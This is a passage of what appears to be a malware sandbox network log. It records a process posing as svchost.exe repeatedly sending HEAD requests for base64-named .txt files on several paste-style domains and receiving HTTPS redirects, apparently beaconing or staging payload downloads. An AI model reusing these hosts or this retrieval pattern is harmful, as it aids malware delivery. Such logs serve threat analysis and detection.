                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=seVzAypNY%2Fq8KOjCrKp0PN6Sbc0LSQHAFm%2Fzb3%2B%2B%2B3Uv%2BrNdF7U3CbGuz6%2BTgbl1JvSAyu%2FsUSNNhbuQKF4aC2q86wXQm5u0yp4OlW5UpfrzGlRixx00wLDEXnXFs19FOXsT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ee4e9c18bc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              71192.168.2.750182188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:05.211678982 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.662674904 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBzmUnF8Gyitt79hYsrLP0tjU3sI5EJymtu35KEWYE9JjMDMRr8mUfFCZgyOtvnPzjvnHM89xLQCk4w9bdePFG7cy55o6FBtw3sCMWpleoRX5tOrLfxKHPhuebv0RNanbBc%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f01c3ac358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.750184104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:05.388803005 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.838387012 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByUtlneduo8tso9THmz%2Boo9w4GzH7V4yeWAHfmCCst7xjtNAWkVj%2B89qqpWnzpguz0ZMK3MluZMWk2v35UjwveqbVRGWyyrpKkaWWzwUywbMpQP5D9y7vo2qj7SW%2B5UbgrBm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f12aad42e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.750191172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:05.669898987 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.141776085 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oW1IH5hwsTg%2B8GShIDHCVQGjhsy1LBApyRMMW7ilxTEBNYCQoLKnXI5RSJhqhJIodluSq3H9gCDEGqzguk%2FHI%2FbDNUypYz%2FoVMCbba5s49kcrH8YLVeKRBcNxdlOyaLK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f3088b728c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              74192.168.2.750196172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:06.148360968 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.601361036 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmbJ3zWBdp0%2ByQFnQnOwQ9DLqZjV7TpwE%2BIAcTAHdWA0E7dm8%2FmblEd1HOSZzYdH7K6L8G4qKamRfwkIm994Pm16EE8czjcIDkrAjDlY%2BJ2%2BwtseCjTSX1jTeFnwJIJNR6dT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f5ee330fa3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              75192.168.2.750202188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:06.338957071 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:06.798424959 CET870INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:06 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGHcYaCPYsru1DBpPtlOe880HY831HYmCv7PaHp%2FTuzrUHrz0zuJZ0mFxTykljgrREjZzfnihCqAptaG9hrm1GCvJIpgxCdW3zZOhiz8Hw5dHVTpkZlw5%2BpTL9v6n2Zerh4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f72e250fa7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              76192.168.2.750205104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:06.607777119 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.059945107 CET883INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21Z%2FGee%2FrfTPM3R2y4CDiAAG9xvlhXmuTg3VTq%2BRzGi3%2BNT%2BAbGPnXpU2wHg%2FERy378DSwZszkGG3oPfXaDPEy6ldqt8GEdYj1%2FKW67krwlBVazhMoodeneBeeqHKk8ek6qF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f8ccb78ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1871&rtt_var=935&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              77192.168.2.750207172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:06.804634094 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.276124001 CET858INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPNF0Z7zctrVM28WeH6dEVdpi7DGaFBv30R3FkSWVlKiMVqTQEwK4g9nRfzzs62BvV873QqPECE4iyDOmq5VMMI%2FmXFmz5zL%2BLtg8TYpEsWZqUTT9FuI32s3dV3EBXmf"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fa1970c47f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              78192.168.2.750214172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:07.282783985 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:07.757966995 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXbrNFOo%2FVFkt7QKoMA%2FFVAZKDNdjmzvc4OBSlQSSzW6BAfHjclKrtH0rkP9ZM%2F3KbddKLUgn6l1H6uOR4k7eDgqcJF%2FOdxRmUOHIGh3fRV8s58l9zISav3JoaatPuEt7n%2Fm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fd1cc26a55-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              79192.168.2.750216188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:07.542223930 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.004745960 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:07 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27DrOlNY%2B6%2BKoMwGbUSevVX73H8yEL5x9JOT7qmkg%2BVB6W5K7CwEMYkRS1F1zYMG8oNd7xisS8VUNZJd2sN4%2BPfIm3MTN008zoWaKvd53eQUdevA%2FFd6PD43LQDhoydb4Cg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3fea859431f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              80192.168.2.750218104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:07.764039040 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.220923901 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEg7V12U15afnM8JJnNpZbKhrtOS5E919l8F7SGvYfqIEBUrW%2BCfxrFOV4W2PUx1opatmQfHFM3fbUMy5nZfmA4sx8Md1OAJNL4fusNcTlEjGSukSaOviIHybHnZolt1cTdO"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc400193a8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1896&rtt_var=948&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              81192.168.2.750220172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:08.010873079 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.464617014 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXJ%2Fk4X13PqONHKd3bXSlGSFrkrukmGxPC3WVsUvN0gaCx%2BHD6VOe%2BEbZt2cR78Cwc5TfyWoaJBCLou9c7Igc63zVBZi%2BAaJTt%2FoAsgT8GzYwukzg7do2up5x8ISu3%2F8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4019c2b43e6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1778&rtt_var=889&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              82192.168.2.750225172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:08.471474886 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:08.957418919 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:08 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Oek%2Fad3pvi61F7xtBtqdcvfsgKOql15XEU1VrUOy9LbUoBDrVtaIrDZodQ1A%2BAbwidv0zh2LUWtY7XrVb6E6j%2F79krAEr6eIlP5bpZ9MOBE%2FRm7q40pV9VP816wSuwkq6sD"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4049de04331-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              83192.168.2.750227188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:08.712117910 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.185534000 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pi2P4L%2BBiw0zRXg7TVjamhW7leo0ow%2FNnOx04ucbnLg1Edk%2FDulYqkyCvUFXy6FYLmTCct0ePRPE8%2Fxo0txptg7Pi5bBQ3kjasEN0t6wAnVNSeKRHsUWp0U6w56KFr0ZEA8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4060e035e60-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              84192.168.2.750229104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:08.964114904 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.422991037 CET882INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rdny66%2F4zn%2BgROP7UtezOWewiaXUGumLsTcl31Sri1UvY1miQ8LZhu6kabqLTqjVrGO71NSiTAXVg7LNN4S619d%2B2G2EYVSR4P5uWcOABpUI%2BF72CNUV2UAkixY%2FhA%2Fe4pBg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40798bede95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2529&rtt_var=1264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              85192.168.2.750231172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:09.191715956 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:09.664475918 CET864INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:09 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAUG06UTbRXjHxvxrMU8nzdSHGs7nhcfsg9ZJhlvTQ0whzpmM1qKS%2F%2FfiABCcYsCqkHy%2BQ7z6FdrkawISVlzPli5yf1KnMizOpjUY7XlcsSJaLj5G%2FekFTbENOt%2B0SbK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4090b3a5e6b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              86192.168.2.750236172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:09.671133995 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.129641056 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FzKQTGOFiEuWZQdvW%2BpOmFR7gBm8vDGOYSCeo5YE%2BUWd0Fj%2FCkaqbQGvBKnzbsX8q%2FQC7sY9arNehrmcferu6PIlXyaQYCM6HSV2Sr8%2FudyPYDDjh7lTI5%2BiW4UftZeLnwDi"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40bfe8f7c7c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1951&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              87192.168.2.750238188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:09.914673090 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.387768030 CET878INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5bN8ssLkH3KpdgobZkdJ8dOkIbbVHHpl%2B%2FaVlLCEHapdz1NFavMoTrTcLrWSYnMsA08SzD%2BrQ1dP3WjIJ%2FRqEGgUjX%2Fe7l2qadSEY8hB9kRXt6tzEiJkuIJLfPvc0wHGdQ%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40d9bd9c407-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1505&rtt_var=752&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              88192.168.2.750240104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:10.136909008 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.617371082 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
